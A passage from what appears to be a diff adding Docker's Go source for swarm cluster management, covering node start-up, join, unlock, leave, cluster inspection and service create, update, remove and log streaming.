reached before node was joined. The attempt to join the swarm will continue in the background. Use the \"docker info\" command to see the current swarm status of your node.") + +// ErrSwarmLocked is returned if the swarm is encrypted and needs a key to unlock it. +var ErrSwarmLocked = fmt.Errorf("Swarm is encrypted and needs to be unlocked before it can be used. Please use \"docker swarm unlock\" to unlock it.") + +// ErrSwarmCertificatesExpired is returned if docker was not started for the whole validity period and they had no chance to renew automatically. +var ErrSwarmCertificatesExpired = errors.New("Swarm certificates have expired. To replace them, leave the swarm and join again.") + +// NetworkSubnetsProvider exposes functions for retrieving the subnets +// of networks managed by Docker, so they can be filtered. +type NetworkSubnetsProvider interface { + V4Subnets() []net.IPNet + V6Subnets() []net.IPNet +} + +// Config provides values for Cluster. +type Config struct { + Root string + Name string + Backend executorpkg.Backend + NetworkSubnetsProvider NetworkSubnetsProvider + + // DefaultAdvertiseAddr is the default host/IP or network interface to use + // if no AdvertiseAddr value is specified. + DefaultAdvertiseAddr string + + // path to store runtime state, such as the swarm control socket + RuntimeRoot string +} + +// Cluster provides capabilities to participate in a cluster as a worker or a +// manager. +type Cluster struct { + sync.RWMutex + *node + root string + runtimeRoot string + config Config + configEvent chan struct{} // todo: make this array and goroutine safe + actualLocalAddr string // after resolution, not persisted + stop bool + err error + cancelDelay func() + attachers map[string]*attacher + locked bool + lastNodeConfig *nodeStartConfig +} + +// attacher manages the in-memory attachment state of a container +// attachment to a global scope network managed by swarm manager. It +// helps in identifying the attachment ID via the taskID and the +// corresponding attachment configuration obtained from the manager. +type attacher struct { + taskID string + config *network.NetworkingConfig + attachWaitCh chan *network.NetworkingConfig + attachCompleteCh chan struct{} + detachWaitCh chan struct{} +} + +type node struct { + *swarmnode.Node + done chan struct{} + ready bool + conn *grpc.ClientConn + client swarmapi.ControlClient + logs swarmapi.LogsClient + reconnectDelay time.Duration + config nodeStartConfig +} + +// nodeStartConfig holds configuration needed to start a new node. Exported +// fields of this structure are saved to disk in json. Unexported fields +// contain data that shouldn't be persisted between daemon reloads. +type nodeStartConfig struct { + // LocalAddr is this machine's local IP or hostname, if specified. + LocalAddr string + // RemoteAddr is the address that was given to "swarm join". It is used + // to find LocalAddr if necessary. + RemoteAddr string + // ListenAddr is the address we bind to, including a port. + ListenAddr string + // AdvertiseAddr is the address other nodes should connect to, + // including a port. + AdvertiseAddr string + joinAddr string + forceNewCluster bool + joinToken string + lockKey []byte + autolock bool +} + +// New creates a new Cluster instance using provided config. +func New(config Config) (*Cluster, error) { + root := filepath.Join(config.Root, swarmDirName) + if err := os.MkdirAll(root, 0700); err != nil { + return nil, err + } + if config.RuntimeRoot == "" { + config.RuntimeRoot = root + } + if err := os.MkdirAll(config.RuntimeRoot, 0700); err != nil { + return nil, err + } + c := &Cluster{ + root: root, + config: config, + configEvent: make(chan struct{}, 10), + runtimeRoot: config.RuntimeRoot, + attachers: make(map[string]*attacher), + } + + nodeConfig, err := c.loadState() + if err != nil { + if os.IsNotExist(err) { + return c, nil + } + return nil, err + } + + n, err := c.startNewNode(*nodeConfig) + if err != nil { + return nil, err + } + + select { + case <-time.After(swarmConnectTimeout): + logrus.Error("swarm component could not be started before timeout was reached") + case <-n.Ready(): + case <-n.done: + if errors.Cause(c.err) == ErrSwarmLocked { + return c, nil + } + if err, ok := errors.Cause(c.err).(x509.CertificateInvalidError); ok && err.Reason == x509.Expired { + c.err = ErrSwarmCertificatesExpired + return c, nil + } + return nil, fmt.Errorf("swarm component could not be started: %v", c.err) + } + go c.reconnectOnFailure(n) + return c, nil +} + +func (c *Cluster) loadState() (*nodeStartConfig, error) { + dt, err := ioutil.ReadFile(filepath.Join(c.root, stateFile)) + if err != nil { + return nil, err + } + // missing certificate means no actual state to restore from + if _, err := os.Stat(filepath.Join(c.root, "certificates/swarm-node.crt")); err != nil { + if os.IsNotExist(err) { + c.clearState() + } + return nil, err + } + var st nodeStartConfig + if err := json.Unmarshal(dt, &st); err != nil { + return nil, err + } + return &st, nil +} + +func (c *Cluster) saveState(config nodeStartConfig) error { + dt, err := json.Marshal(config) + if err != nil { + return err + } + return ioutils.AtomicWriteFile(filepath.Join(c.root, stateFile), dt, 0600) +} + +func (c *Cluster) reconnectOnFailure(n *node) { + for { + <-n.done + c.Lock() + if c.stop || c.node != nil { + c.Unlock() + return + } + n.reconnectDelay *= 2 + if n.reconnectDelay > maxReconnectDelay { + n.reconnectDelay = maxReconnectDelay + } + logrus.Warnf("Restarting swarm in %.2f seconds", n.reconnectDelay.Seconds()) + delayCtx, cancel := context.WithTimeout(context.Background(), n.reconnectDelay) + c.cancelDelay = cancel + c.Unlock() + <-delayCtx.Done() + if delayCtx.Err() != context.DeadlineExceeded { + return + } + c.Lock() + if c.node != nil { + c.Unlock() + return + } + var err error + config := n.config + config.RemoteAddr = c.getRemoteAddress() + config.joinAddr = config.RemoteAddr + n, err = c.startNewNode(config) + if err != nil { + c.err = err + close(n.done) + } + c.Unlock() + } +} + +func (c *Cluster) startNewNode(conf nodeStartConfig) (*node, error) { + if err := c.config.Backend.IsSwarmCompatible(); err != nil { + return nil, err + } + + actualLocalAddr := conf.LocalAddr + if actualLocalAddr == "" { + // If localAddr was not specified, resolve it automatically + // based on the route to joinAddr. localAddr can only be left + // empty on "join". + listenHost, _, err := net.SplitHostPort(conf.ListenAddr) + if err != nil { + return nil, fmt.Errorf("could not parse listen address: %v", err) + } + + listenAddrIP := net.ParseIP(listenHost) + if listenAddrIP == nil || !listenAddrIP.IsUnspecified() { + actualLocalAddr = listenHost + } else { + if conf.RemoteAddr == "" { + // Should never happen except using swarms created by + // old versions that didn't save remoteAddr. + conf.RemoteAddr = "8.8.8.8:53" + } + conn, err := net.Dial("udp", conf.RemoteAddr) + if err != nil { + return nil, fmt.Errorf("could not find local IP address: %v", err) + } + localHostPort := conn.LocalAddr().String() + actualLocalAddr, _, _ = net.SplitHostPort(localHostPort) + conn.Close() + } + } + + var control string + if runtime.GOOS == "windows" { + control = `\\.\pipe\` + controlSocket + } else { + control = filepath.Join(c.runtimeRoot, controlSocket) + } + + c.node = nil + c.cancelDelay = nil + c.stop = false + n, err := swarmnode.New(&swarmnode.Config{ + Hostname: c.config.Name, + ForceNewCluster: conf.forceNewCluster, + ListenControlAPI: control, + ListenRemoteAPI: conf.ListenAddr, + AdvertiseRemoteAPI: conf.AdvertiseAddr, + JoinAddr: conf.joinAddr, + StateDir: c.root, + JoinToken: conf.joinToken, + Executor: container.NewExecutor(c.config.Backend), + HeartbeatTick: 1, + ElectionTick: 3, + UnlockKey: conf.lockKey, + AutoLockManagers: conf.autolock, + PluginGetter: c.config.Backend.PluginGetter(), + }) + + if err != nil { + return nil, err + } + ctx := context.Background() + if err := n.Start(ctx); err != nil { + return nil, err + } + node := &node{ + Node: n, + done: make(chan struct{}), + reconnectDelay: initialReconnectDelay, + config: conf, + } + c.node = node + c.actualLocalAddr = actualLocalAddr // not saved + c.saveState(conf) + + c.config.Backend.DaemonJoinsCluster(c) + go func() { + err := detectLockedError(n.Err(ctx)) + if err != nil { + logrus.Errorf("cluster exited with error: %v", err) + } + c.Lock() + c.node = nil + c.err = err + if errors.Cause(err) == ErrSwarmLocked { + c.locked = true + confClone := conf + c.lastNodeConfig = &confClone + } + c.Unlock() + close(node.done) + }() + + go func() { + select { + case <-n.Ready(): + c.Lock() + node.ready = true + c.err = nil + c.Unlock() + case <-ctx.Done(): + } + c.configEvent <- struct{}{} + }() + + go func() { + for conn := range n.ListenControlSocket(ctx) { + c.Lock() + if node.conn != conn { + if conn == nil { + node.client = nil + node.logs = nil + } else { + node.client = swarmapi.NewControlClient(conn) + node.logs = swarmapi.NewLogsClient(conn) + } + } + node.conn = conn + c.Unlock() + c.configEvent <- struct{}{} + } + }() + + return node, nil +} + +// Init initializes new cluster from user provided request. +func (c *Cluster) Init(req types.InitRequest) (string, error) { + c.Lock() + if c.swarmExists() { + if !req.ForceNewCluster { + c.Unlock() + return "", ErrSwarmExists + } + if err := c.stopNode(); err != nil { + c.Unlock() + return "", err + } + } + + if err := validateAndSanitizeInitRequest(&req); err != nil { + c.Unlock() + return "", err + } + + listenHost, listenPort, err := resolveListenAddr(req.ListenAddr) + if err != nil { + c.Unlock() + return "", err + } + + advertiseHost, advertisePort, err := c.resolveAdvertiseAddr(req.AdvertiseAddr, listenPort) + if err != nil { + c.Unlock() + return "", err + } + + localAddr := listenHost + + // If the local address is undetermined, the advertise address + // will be used as local address, if it belongs to this system. + // If the advertise address is not local, then we try to find + // a system address to use as local address. If this fails, + // we give up and ask user to pass the listen address. + if net.ParseIP(localAddr).IsUnspecified() { + advertiseIP := net.ParseIP(advertiseHost) + + found := false + for _, systemIP := range listSystemIPs() { + if systemIP.Equal(advertiseIP) { + localAddr = advertiseIP.String() + found = true + break + } + } + + if !found { + ip, err := c.resolveSystemAddr() + if err != nil { + c.Unlock() + logrus.Warnf("Could not find a local address: %v", err) + return "", errMustSpecifyListenAddr + } + localAddr = ip.String() + } + } + + // todo: check current state existing + n, err := c.startNewNode(nodeStartConfig{ + forceNewCluster: req.ForceNewCluster, + autolock: req.AutoLockManagers, + LocalAddr: localAddr, + ListenAddr: net.JoinHostPort(listenHost, listenPort), + AdvertiseAddr: net.JoinHostPort(advertiseHost, advertisePort), + }) + if err != nil { + c.Unlock() + return "", err + } + c.Unlock() + + select { + case <-n.Ready(): + if err := initClusterSpec(n, req.Spec); err != nil { + return "", err + } + go c.reconnectOnFailure(n) + return n.NodeID(), nil + case <-n.done: + c.RLock() + defer c.RUnlock() + if !req.ForceNewCluster { // if failure on first attempt don't keep state + if err := c.clearState(); err != nil { + return "", err + } + } + return "", c.err + } +} + +// Join makes current Cluster part of an existing swarm cluster. +func (c *Cluster) Join(req types.JoinRequest) error { + c.Lock() + if c.swarmExists() { + c.Unlock() + return ErrSwarmExists + } + if err := validateAndSanitizeJoinRequest(&req); err != nil { + c.Unlock() + return err + } + + listenHost, listenPort, err := resolveListenAddr(req.ListenAddr) + if err != nil { + c.Unlock() + return err + } + + var advertiseAddr string + if req.AdvertiseAddr != "" { + advertiseHost, advertisePort, err := c.resolveAdvertiseAddr(req.AdvertiseAddr, listenPort) + // For joining, we don't need to provide an advertise address, + // since the remote side can detect it. + if err == nil { + advertiseAddr = net.JoinHostPort(advertiseHost, advertisePort) + } + } + + // todo: check current state existing + n, err := c.startNewNode(nodeStartConfig{ + RemoteAddr: req.RemoteAddrs[0], + ListenAddr: net.JoinHostPort(listenHost, listenPort), + AdvertiseAddr: advertiseAddr, + joinAddr: req.RemoteAddrs[0], + joinToken: req.JoinToken, + }) + if err != nil { + c.Unlock() + return err + } + c.Unlock() + + select { + case <-time.After(swarmConnectTimeout): + // attempt to connect will continue in background, but reconnect only if it didn't fail + go func() { + select { + case <-n.Ready(): + c.reconnectOnFailure(n) + case <-n.done: + logrus.Errorf("failed to join the cluster: %+v", c.err) + } + }() + return ErrSwarmJoinTimeoutReached + case <-n.Ready(): + go c.reconnectOnFailure(n) + return nil + case <-n.done: + c.RLock() + defer c.RUnlock() + return c.err + } +} + +// GetUnlockKey returns the unlock key for the swarm. +func (c *Cluster) GetUnlockKey() (string, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return "", c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + client := swarmapi.NewCAClient(c.conn) + + r, err := client.GetUnlockKey(ctx, &swarmapi.GetUnlockKeyRequest{}) + if err != nil { + return "", err + } + + if len(r.UnlockKey) == 0 { + // no key + return "", nil + } + + return encryption.HumanReadableKey(r.UnlockKey), nil +} + +// UnlockSwarm provides a key to decrypt data that is encrypted at rest. +func (c *Cluster) UnlockSwarm(req types.UnlockRequest) error { + c.RLock() + if !c.isActiveManager() { + if err := c.errNoManager(); err != ErrSwarmLocked { + c.RUnlock() + return err + } + } + + if c.node != nil || c.locked != true { + c.RUnlock() + return errors.New("swarm is not locked") + } + c.RUnlock() + + key, err := encryption.ParseHumanReadableKey(req.UnlockKey) + if err != nil { + return err + } + + c.Lock() + config := *c.lastNodeConfig + config.lockKey = key + n, err := c.startNewNode(config) + if err != nil { + c.Unlock() + return err + } + c.Unlock() + select { + case <-n.Ready(): + case <-n.done: + if errors.Cause(c.err) == ErrSwarmLocked { + return errors.New("swarm could not be unlocked: invalid key provided") + } + return fmt.Errorf("swarm component could not be started: %v", c.err) + } + go c.reconnectOnFailure(n) + return nil +} + +// stopNode is a helper that stops the active c.node and waits until it has +// shut down. Call while keeping the cluster lock. +func (c *Cluster) stopNode() error { + if c.node == nil { + return nil + } + c.stop = true + if c.cancelDelay != nil { + c.cancelDelay() + c.cancelDelay = nil + } + node := c.node + ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second) + defer cancel() + // TODO: can't hold lock on stop because it calls back to network + c.Unlock() + defer c.Lock() + if err := node.Stop(ctx); err != nil && !strings.Contains(err.Error(), "context canceled") { + return err + } + <-node.done + return nil +} + +func removingManagerCausesLossOfQuorum(reachable, unreachable int) bool { + return reachable-2 <= unreachable +} + +func isLastManager(reachable, unreachable int) bool { + return reachable == 1 && unreachable == 0 +} + +// Leave shuts down Cluster and removes current state. +func (c *Cluster) Leave(force bool) error { + c.Lock() + node := c.node + if node == nil { + if c.locked { + c.locked = false + c.lastNodeConfig = nil + c.Unlock() + } else if c.err == ErrSwarmCertificatesExpired { + c.err = nil + c.Unlock() + } else { + c.Unlock() + return ErrNoSwarm + } + } else { + if node.Manager() != nil && !force { + msg := "You are attempting to leave the swarm on a node that is participating as a manager. " + if c.isActiveManager() { + active, reachable, unreachable, err := c.managerStats() + if err == nil { + if active && removingManagerCausesLossOfQuorum(reachable, unreachable) { + if isLastManager(reachable, unreachable) { + msg += "Removing the last manager erases all current state of the swarm. Use `--force` to ignore this message. " + c.Unlock() + return fmt.Errorf(msg) + } + msg += fmt.Sprintf("Removing this node leaves %v managers out of %v. Without a Raft quorum your swarm will be inaccessible. ", reachable-1, reachable+unreachable) + } + } + } else { + msg += "Doing so may lose the consensus of your cluster. " + } + + msg += "The only way to restore a swarm that has lost consensus is to reinitialize it with `--force-new-cluster`. Use `--force` to suppress this message." + c.Unlock() + return fmt.Errorf(msg) + } + if err := c.stopNode(); err != nil { + logrus.Errorf("failed to shut down cluster node: %v", err) + signal.DumpStacks("") + c.Unlock() + return err + } + c.Unlock() + if nodeID := node.NodeID(); nodeID != "" { + nodeContainers, err := c.listContainerForNode(nodeID) + if err != nil { + return err + } + for _, id := range nodeContainers { + if err := c.config.Backend.ContainerRm(id, &apitypes.ContainerRmConfig{ForceRemove: true}); err != nil { + logrus.Errorf("error removing %v: %v", id, err) + } + } + } + } + c.configEvent <- struct{}{} + // todo: cleanup optional? + if err := c.clearState(); err != nil { + return err + } + + return nil +} + +func (c *Cluster) listContainerForNode(nodeID string) ([]string, error) { + var ids []string + filters := filters.NewArgs() + filters.Add("label", fmt.Sprintf("com.docker.swarm.node.id=%s", nodeID)) + containers, err := c.config.Backend.Containers(&apitypes.ContainerListOptions{ + Filters: filters, + }) + if err != nil { + return []string{}, err + } + for _, c := range containers { + ids = append(ids, c.ID) + } + return ids, nil +} + +func (c *Cluster) clearState() error { + // todo: backup this data instead of removing? + if err := os.RemoveAll(c.root); err != nil { + return err + } + if err := os.MkdirAll(c.root, 0700); err != nil { + return err + } + c.config.Backend.DaemonLeavesCluster() + return nil +} + +func (c *Cluster) getRequestContext() (context.Context, func()) { // TODO: not needed when requests don't block on qourum lost + return context.WithTimeout(context.Background(), swarmRequestTimeout) +} + +// Inspect retrieves the configuration properties of a managed swarm cluster. +func (c *Cluster) Inspect() (types.Swarm, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return types.Swarm{}, c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + swarm, err := getSwarm(ctx, c.client) + if err != nil { + return types.Swarm{}, err + } + + return convert.SwarmFromGRPC(*swarm), nil +} + +// Update updates configuration of a managed swarm cluster. +func (c *Cluster) Update(version uint64, spec types.Spec, flags types.UpdateFlags) error { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + swarm, err := getSwarm(ctx, c.client) + if err != nil { + return err + } + + // In update, client should provide the complete spec of the swarm, including + // Name and Labels. If a field is specified with 0 or nil, then the default value + // will be used to swarmkit. + clusterSpec, err := convert.SwarmSpecToGRPC(spec) + if err != nil { + return err + } + + _, err = c.client.UpdateCluster( + ctx, + &swarmapi.UpdateClusterRequest{ + ClusterID: swarm.ID, + Spec: &clusterSpec, + ClusterVersion: &swarmapi.Version{ + Index: version, + }, + Rotation: swarmapi.KeyRotation{ + WorkerJoinToken: flags.RotateWorkerToken, + ManagerJoinToken: flags.RotateManagerToken, + ManagerUnlockKey: flags.RotateManagerUnlockKey, + }, + }, + ) + return err +} + +// IsManager returns true if Cluster is participating as a manager. +func (c *Cluster) IsManager() bool { + c.RLock() + defer c.RUnlock() + return c.isActiveManager() +} + +// IsAgent returns true if Cluster is participating as a worker/agent. +func (c *Cluster) IsAgent() bool { + c.RLock() + defer c.RUnlock() + return c.node != nil && c.ready +} + +// GetLocalAddress returns the local address. +func (c *Cluster) GetLocalAddress() string { + c.RLock() + defer c.RUnlock() + return c.actualLocalAddr +} + +// GetListenAddress returns the listen address. +func (c *Cluster) GetListenAddress() string { + c.RLock() + defer c.RUnlock() + if c.node != nil { + return c.node.config.ListenAddr + } + return "" +} + +// GetAdvertiseAddress returns the remotely reachable address of this node. +func (c *Cluster) GetAdvertiseAddress() string { + c.RLock() + defer c.RUnlock() + if c.node != nil && c.node.config.AdvertiseAddr != "" { + advertiseHost, _, _ := net.SplitHostPort(c.node.config.AdvertiseAddr) + return advertiseHost + } + return c.actualLocalAddr +} + +// GetRemoteAddress returns a known advertise address of a remote manager if +// available. +// todo: change to array/connect with info +func (c *Cluster) GetRemoteAddress() string { + c.RLock() + defer c.RUnlock() + return c.getRemoteAddress() +} + +func (c *Cluster) getRemoteAddress() string { + if c.node == nil { + return "" + } + nodeID := c.node.NodeID() + for _, r := range c.node.Remotes() { + if r.NodeID != nodeID { + return r.Addr + } + } + return "" +} + +// ListenClusterEvents returns a channel that receives messages on cluster +// participation changes. +// todo: make cancelable and accessible to multiple callers +func (c *Cluster) ListenClusterEvents() <-chan struct{} { + return c.configEvent +} + +// Info returns information about the current cluster state. +func (c *Cluster) Info() types.Info { + info := types.Info{ + NodeAddr: c.GetAdvertiseAddress(), + } + + c.RLock() + defer c.RUnlock() + + if c.node == nil { + info.LocalNodeState = types.LocalNodeStateInactive + if c.cancelDelay != nil { + info.LocalNodeState = types.LocalNodeStateError + } + if c.locked { + info.LocalNodeState = types.LocalNodeStateLocked + } else if c.err == ErrSwarmCertificatesExpired { + info.LocalNodeState = types.LocalNodeStateError + } + } else { + info.LocalNodeState = types.LocalNodeStatePending + if c.ready == true { + info.LocalNodeState = types.LocalNodeStateActive + } else if c.locked { + info.LocalNodeState = types.LocalNodeStateLocked + } + } + if c.err != nil { + info.Error = c.err.Error() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + if c.isActiveManager() { + info.ControlAvailable = true + swarm, err := c.Inspect() + if err != nil { + info.Error = err.Error() + } + + // Strip JoinTokens + info.Cluster = swarm.ClusterInfo + + if r, err := c.client.ListNodes(ctx, &swarmapi.ListNodesRequest{}); err == nil { + info.Nodes = len(r.Nodes) + for _, n := range r.Nodes { + if n.ManagerStatus != nil { + info.Managers = info.Managers + 1 + } + } + } + } + + if c.node != nil { + for _, r := range c.node.Remotes() { + info.RemoteManagers = append(info.RemoteManagers, types.Peer{NodeID: r.NodeID, Addr: r.Addr}) + } + info.NodeID = c.node.NodeID() + } + + return info +} + +// isActiveManager should not be called without a read lock +func (c *Cluster) isActiveManager() bool { + return c.node != nil && c.conn != nil +} + +// swarmExists should not be called without a read lock +func (c *Cluster) swarmExists() bool { + return c.node != nil || c.locked || c.err == ErrSwarmCertificatesExpired +} + +// errNoManager returns error describing why manager commands can't be used. +// Call with read lock. +func (c *Cluster) errNoManager() error { + if c.node == nil { + if c.locked { + return ErrSwarmLocked + } + if c.err == ErrSwarmCertificatesExpired { + return ErrSwarmCertificatesExpired + } + return fmt.Errorf("This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again.") + } + if c.node.Manager() != nil { + return fmt.Errorf("This node is not a swarm manager. Manager is being prepared or has trouble connecting to the cluster.") + } + return fmt.Errorf("This node is not a swarm manager. Worker nodes can't be used to view or modify cluster state. Please run this command on a manager node or promote the current node to a manager.") +} + +// GetServices returns all services of a managed swarm cluster. +func (c *Cluster) GetServices(options apitypes.ServiceListOptions) ([]types.Service, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return nil, c.errNoManager() + } + + filters, err := newListServicesFilters(options.Filters) + if err != nil { + return nil, err + } + ctx, cancel := c.getRequestContext() + defer cancel() + + r, err := c.client.ListServices( + ctx, + &swarmapi.ListServicesRequest{Filters: filters}) + if err != nil { + return nil, err + } + + services := []types.Service{} + + for _, service := range r.Services { + services = append(services, convert.ServiceFromGRPC(*service)) + } + + return services, nil +} + +// imageWithDigestString takes an image such as name or name:tag +// and returns the image pinned to a digest, such as name@sha256:34234... +// Due to the difference between the docker/docker/reference, and the +// docker/distribution/reference packages, we're parsing the image twice. +// As the two packages converge, this function should be simplified. +// TODO(nishanttotla): After the packages converge, the function must +// convert distreference.Named -> distreference.Canonical, and the logic simplified. +func (c *Cluster) imageWithDigestString(ctx context.Context, image string, authConfig *apitypes.AuthConfig) (string, error) { + if _, err := digest.ParseDigest(image); err == nil { + return "", errors.New("image reference is an image ID") + } + ref, err := distreference.ParseNamed(image) + if err != nil { + return "", err + } + // only query registry if not a canonical reference (i.e. with digest) + if _, ok := ref.(distreference.Canonical); !ok { + // create a docker/docker/reference Named object because GetRepository needs it + dockerRef, err := reference.ParseNamed(image) + if err != nil { + return "", err + } + dockerRef = reference.WithDefaultTag(dockerRef) + namedTaggedRef, ok := dockerRef.(reference.NamedTagged) + if !ok { + return "", fmt.Errorf("unable to cast image to NamedTagged reference object") + } + + repo, _, err := c.config.Backend.GetRepository(ctx, namedTaggedRef, authConfig) + if err != nil { + return "", err + } + dscrptr, err := repo.Tags(ctx).Get(ctx, namedTaggedRef.Tag()) + if err != nil { + return "", err + } + + namedDigestedRef, err := distreference.WithDigest(distreference.EnsureTagged(ref), dscrptr.Digest) + if err != nil { + return "", err + } + return namedDigestedRef.String(), nil + } + // reference already contains a digest, so just return it + return ref.String(), nil +} + +// CreateService creates a new service in a managed swarm cluster. +func (c *Cluster) CreateService(s types.ServiceSpec, encodedAuth string) (*apitypes.ServiceCreateResponse, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return nil, c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + err := c.populateNetworkID(ctx, c.client, &s) + if err != nil { + return nil, err + } + + serviceSpec, err := convert.ServiceSpecToGRPC(s) + if err != nil { + return nil, err + } + + ctnr := serviceSpec.Task.GetContainer() + if ctnr == nil { + return nil, fmt.Errorf("service does not use container tasks") + } + + if encodedAuth != "" { + ctnr.PullOptions = &swarmapi.ContainerSpec_PullOptions{RegistryAuth: encodedAuth} + } + + // retrieve auth config from encoded auth + authConfig := &apitypes.AuthConfig{} + if encodedAuth != "" { + if err := json.NewDecoder(base64.NewDecoder(base64.URLEncoding, strings.NewReader(encodedAuth))).Decode(authConfig); err != nil { + logrus.Warnf("invalid authconfig: %v", err) + } + } + + resp := &apitypes.ServiceCreateResponse{} + + // pin image by digest + if os.Getenv("DOCKER_SERVICE_PREFER_OFFLINE_IMAGE") != "1" { + digestImage, err := c.imageWithDigestString(ctx, ctnr.Image, authConfig) + if err != nil { + logrus.Warnf("unable to pin image %s to digest: %s", ctnr.Image, err.Error()) + resp.Warnings = append(resp.Warnings, fmt.Sprintf("unable to pin image %s to digest: %s", ctnr.Image, err.Error())) + } else if ctnr.Image != digestImage { + logrus.Debugf("pinning image %s by digest: %s", ctnr.Image, digestImage) + ctnr.Image = digestImage + } else { + logrus.Debugf("creating service using supplied digest reference %s", ctnr.Image) + } + } + + r, err := c.client.CreateService(ctx, &swarmapi.CreateServiceRequest{Spec: &serviceSpec}) + if err != nil { + return nil, err + } + + resp.ID = r.Service.ID + return resp, nil +} + +// GetService returns a service based on an ID or name. +func (c *Cluster) GetService(input string) (types.Service, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return types.Service{}, c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + service, err := getService(ctx, c.client, input) + if err != nil { + return types.Service{}, err + } + return convert.ServiceFromGRPC(*service), nil +} + +// UpdateService updates existing service to match new properties. +func (c *Cluster) UpdateService(serviceIDOrName string, version uint64, spec types.ServiceSpec, encodedAuth string, registryAuthFrom string) (*apitypes.ServiceUpdateResponse, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return nil, c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + err := c.populateNetworkID(ctx, c.client, &spec) + if err != nil { + return nil, err + } + + serviceSpec, err := convert.ServiceSpecToGRPC(spec) + if err != nil { + return nil, err + } + + currentService, err := getService(ctx, c.client, serviceIDOrName) + if err != nil { + return nil, err + } + + newCtnr := serviceSpec.Task.GetContainer() + if newCtnr == nil { + return nil, fmt.Errorf("service does not use container tasks") + } + + if encodedAuth != "" { + newCtnr.PullOptions = &swarmapi.ContainerSpec_PullOptions{RegistryAuth: encodedAuth} + } else { + // this is needed because if the encodedAuth isn't being updated then we + // shouldn't lose it, and continue to use the one that was already present + var ctnr *swarmapi.ContainerSpec + switch registryAuthFrom { + case apitypes.RegistryAuthFromSpec, "": + ctnr = currentService.Spec.Task.GetContainer() + case apitypes.RegistryAuthFromPreviousSpec: + if currentService.PreviousSpec == nil { + return nil, fmt.Errorf("service does not have a previous spec") + } + ctnr = currentService.PreviousSpec.Task.GetContainer() + default: + return nil, fmt.Errorf("unsupported registryAuthFromValue") + } + if ctnr == nil { + return nil, fmt.Errorf("service does not use container tasks") + } + newCtnr.PullOptions = ctnr.PullOptions + // update encodedAuth so it can be used to pin image by digest + if ctnr.PullOptions != nil { + encodedAuth = ctnr.PullOptions.RegistryAuth + } + } + + // retrieve auth config from encoded auth + authConfig := &apitypes.AuthConfig{} + if encodedAuth != "" { + if err := json.NewDecoder(base64.NewDecoder(base64.URLEncoding, strings.NewReader(encodedAuth))).Decode(authConfig); err != nil { + logrus.Warnf("invalid authconfig: %v", err) + } + } + + resp := &apitypes.ServiceUpdateResponse{} + + // pin image by digest + if os.Getenv("DOCKER_SERVICE_PREFER_OFFLINE_IMAGE") != "1" { + digestImage, err := c.imageWithDigestString(ctx, newCtnr.Image, authConfig) + if err != nil { + logrus.Warnf("unable to pin image %s to digest: %s", newCtnr.Image, err.Error()) + resp.Warnings = append(resp.Warnings, fmt.Sprintf("unable to pin image %s to digest: %s", newCtnr.Image, err.Error())) + } else if newCtnr.Image != digestImage { + logrus.Debugf("pinning image %s by digest: %s", newCtnr.Image, digestImage) + newCtnr.Image = digestImage + } else { + logrus.Debugf("updating service using supplied digest reference %s", newCtnr.Image) + } + } + + _, err = c.client.UpdateService( + ctx, + &swarmapi.UpdateServiceRequest{ + ServiceID: currentService.ID, + Spec: &serviceSpec, + ServiceVersion: &swarmapi.Version{ + Index: version, + }, + }, + ) + + return resp, err +} + +// RemoveService removes a service from a managed swarm cluster. +func (c *Cluster) RemoveService(input string) error { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + service, err := getService(ctx, c.client, input) + if err != nil { + return err + } + + if _, err := c.client.RemoveService(ctx, &swarmapi.RemoveServiceRequest{ServiceID: service.ID}); err != nil { + return err + } + return nil +} + +// ServiceLogs collects service logs and writes them back to `config.OutStream` +func (c *Cluster) ServiceLogs(ctx context.Context, input string, config *backend.ContainerLogsConfig, started chan struct{}) error { + c.RLock() + if !c.isActiveManager() { + c.RUnlock() + return c.errNoManager() + } + + service, err := getService(ctx, c.client, input) + if err != nil { + c.RUnlock() + return err + } + + stream, err := c.logs.SubscribeLogs(ctx, &swarmapi.SubscribeLogsRequest{ + Selector: &swarmapi.LogSelector{ + ServiceIDs: []string{service.ID}, + }, + Options: &swarmapi.LogSubscriptionOptions{ + Follow: config.Follow, + }, + }) + if err != nil { + c.RUnlock() + return err + } + + wf := ioutils.NewWriteFlusher(config.OutStream) + defer wf.Close() + close(started) + wf.Flush() + + outStream := stdcopy.NewStdWriter(wf, stdcopy.Stdout) + errStream := stdcopy.NewStdWriter(wf, stdcopy.Stderr) + + // Release the lock before starting the stream. + c.RUnlock() + for { + // Check the context before doing anything. + select { + case <-ctx.Done(): + return ctx.Err() + default: + } + + subscribeMsg, err := stream.Recv() + if err == io.EOF { + return nil + } + if err != nil { + return err + } + + for _, msg := range subscribeMsg.Messages { + data := []byte{} + + if config.Timestamps { + ts, err := ptypes.Timestamp(msg.Timestamp) + if err != nil { + return err + } + data = append(data, []byte(ts.Format(logger.TimeFormat)+" ")...) + } + + data = append(data, []byte(fmt.Sprintf("%s.node.id=%s,%s.service.id=%s,%s.task.id=%s ", + contextPrefix, msg.Context.NodeID, + contextPrefix, msg.Context.ServiceID, + contextPrefix, msg.Context.TaskID, + ))...) + + data = append(data, msg.Data...) + + switch msg.Stream { + case swarmapi.LogStreamStdout: + outStream.Write(data) + case swarmapi.LogStreamStderr: + errStream.Write(data) + } + } + } +} + +// GetNodes returns a list of all nodes known to a cluster. +func (c *Cluster) GetNodes(options apitypes.NodeListOptions) ([]types.Node, error) { + c.RLock() + defer c.RUnlock() + + if 